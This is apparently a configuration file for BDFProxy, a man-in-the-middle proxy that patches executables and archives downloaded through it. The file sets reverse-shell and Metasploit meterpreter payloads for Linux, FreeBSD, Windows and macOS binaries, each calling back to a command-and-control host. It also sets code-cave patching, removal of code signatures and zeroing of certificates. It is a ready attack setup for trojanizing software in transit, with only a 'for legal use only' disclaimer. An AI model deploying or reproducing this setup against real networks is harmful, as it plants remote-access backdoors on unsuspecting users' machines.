# 
#   Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#	
#   Copyright Josh Pitts 2013-2021
#   For legal use only

[Overall]
#these require a full restart of the BDFProxy addon
MaxSizeFileRequested = 100000000 # will send a 502 request of large content to the client (server error)
logname = bdf.log
loglevel = DEBUG 
resourceScriptFile = bdfproxy_msf_resource.rc


[hosts]

#Hosts that are never patched, but still pass through the proxy. You can include host, recommended to do both.

denylist = hotmail.com, youtube.com   # a comma is null do not leave blank


[keywords]

#For denylist note binaries that you do not want to touch at all

# Also applied in zip files

denylist = .dll, .sys


[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files 
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 50000000

denylist = .dll,  #don't do dlls in a zip file

[TAR]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 50000000

denylist = ,   # a comma is null do not leave blank

[targets]
	#MAKE SURE that your settings for host and port DO NOT
	# overlap between different types of payloads
	
	[[ALL]] # DEFAULT settings for all targets REQUIRED
	
	LinuxType = ALL 	# choices: x86/x64/ALL/None
	WindowsType = ALL 	# choices: x86/x64/ALL/None
	FatPriority = x64   # choices: x86 or x64
	
	FileSizeMax = 10000000  # ~10 MB (just under) No patching of files this large

	CompressedFiles = True #True/False
    LOGTOFILE = True

	[[BinaryTypes]]

		[[[LinuxArmv7_32]]]
		SHELL = reverse_shell_tcp   # This is the BDF syntax
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		SUPPLIED_SHELLCODE = None
        	# Run preprocessor True/False
        	PREPROCESS = False          
		#MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax

	
		[[[FreeBSDx86]]]
		PAYLOAD = fork_reverse_shell_tcp   # This is the BDF syntax
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		PATCH_METHOD = text_off_entry
		MODE=text_splitting
		MODIFIER=automatic
		ENCODER=None
		SUPPLIED_SHELLCODE = None
        # Run preprocessor True/False
        PREPROCESS = False          
		#MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax

		[[[LinuxIntelx86]]]
		PAYLOAD = fork_reverse_shell_tcp   # This is the BDF syntax
		PATCH_METHOD = text_off_entry
		MODE=text_splitting
		MODIFIER=automatic
		ENCODER=None
		HOST = 192.168.1.168 		# The C2
		PORT = 8888
		SUPPLIED_SHELLCODE = None
        # Run preprocessor True/False
        PREPROCESS = False          
		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
        		
		[[[LinuxIntelx64]]]
		PAYLOAD = fork_reverse_shell_tcp
		PATCH_METHOD = text_off_entry
		MODE=text_splitting
		MODIFIER=automatic
		ENCODER=None
		HOST = 192.168.1.16
		PORT = 9999
		SUPPLIED_SHELLCODE = None
        	# Run preprocessor True/False
        	PREPROCESS = False         
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[WindowsIntelx86]]]
		PATCH_METHOD = jmp_at_entrypoint 
        MODE=cave_jumping
        MODIFIER=automatic
		HOST = 192.168.1.16
		PORT = 8090
		# PAYLOAD for use with automatic PATCH_METHOD
		PAYLOAD = iat_reverse_tcp_staged_threaded
		# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
		SUPPLIED_SHELLCODE = None
		ZERO_CERT = True
		ENCODER=None
		CHANGE_ACCESS = True
		# PATCH_DLLs as they come across
		PATCH_DLL = False
		# PUT Import Directory Table in a Cave vs a new section (Experimental)
		IDT_IN_CAVE = False 
		# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
		#  with PATCH_METHOD 'replace' use an EXE not DLL
		SUPPLIED_BINARY = veil_go_payload.exe
		# CODE_SIGN is for code signing.  You must configure your own certs, see BDF readme for details.
       	CODE_SIGN = False
       	# Run preprocessor True/False
		MSFPAYLOAD = windows/meterpreter/reverse_tcp

		[[[WindowsIntelx64]]]
		PATCH_METHOD=jmp_at_entrypoint
        MODE=cave_jumping
        MODIFIER=automatic
		HOST = 192.168.1.16
		PORT = 8088
		# PAYLOAD for use with automatic PATCH_METHOD
		PAYLOAD = iat_reverse_tcp_staged_threaded
		# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
		SUPPLIED_SHELLCODE = None
		ENCODER=None
		ZERO_CERT = True
		PATCH_DLL = False
		# PUT Import Directory Table in a Cave vs a new section (Experimental)
		IDT_IN_CAVE = False
		# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
		#  with PATCH_METHOD 'replace' use an EXE not DLL
        SUPPLIED_BINARY = pentest_x64_payload.exe
		# CODE_SIGN is for code signing.  You must configure your own certs, see BDF readme for details.
        CODE_SIGN = False
        # Run preprocessor True/False
        PREPROCESS = False          
		MSFPAYLOAD = windows/x64/shell/reverse_tcp
		CHANGE_ACCESS = True

		[[[MachoIntelx86]]]
		PATCH_METHOD = pre_text_infection
		MODIFIER=automatic
		MODE=remove_signature
		ENCODER=None
		PAYLOAD = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 4444
		SUPPLIED_SHELLCODE = None
        	# Run preprocessor True/False
        	PREPROCESS = False         
		MSFPAYLOAD = linux/x64/shell_reverse_tcp

		[[[MachoIntelx64]]]
		PATCH_METHOD = pre_text_infection
		MODIFIER=automatic
		MODE=remove_signature
		ENCODER=None
		PAYLOAD = reverse_shell_tcp
		HOST = 192.168.1.16
		PORT = 5555
		SUPPLIED_SHELLCODE = None
        	# Run preprocessor True/False
        	PREPROCESS = False         
		MSFPAYLOAD = linux/x64/shell_reverse_tcp
	
